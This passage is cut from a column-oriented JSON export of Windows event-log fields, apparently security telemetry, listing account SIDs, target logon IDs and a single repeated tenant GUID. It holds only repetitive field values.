18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\"],\"TargetLogonId\":[\"NaN\",\"0x3e4\",\"0x3e4\",\"0x0\",\"0x0\",\"0x3e5\",\"0x3e4\",\"0x0\",\"0x3e5\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x527d50d\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x527d50d\",\"0x0\",\"0x3e5\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e5\",\"0x0\",\"0x0\",\"0x0\",\"NaN\",\"0x0\",\"0x0\",\"NaN\",\"0xab5a5ac\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e5\",\"0x0\",\"0x0\",\"0x527d50d\",\"0x527d50d\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x527d50d\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x527d50d\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x527d50d\",\"0x3e5\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x527d50d\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"NaN\",\"0x3e4\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x3e4\",\"0x3e4\",\"0x0\",\"0x3e4\",\"0x3e4\",\"0x0\",\"0x3e4\",\"0x3e4\",\"0x0\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x0\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"NaN\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"NaN\",\"0x0\",\"0x0\",\"NaN\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"NaN\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"NaN\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x3e4\",\"NaN\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\"],\"TenantId\":[\"NaN\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"NaN\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"NaN\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4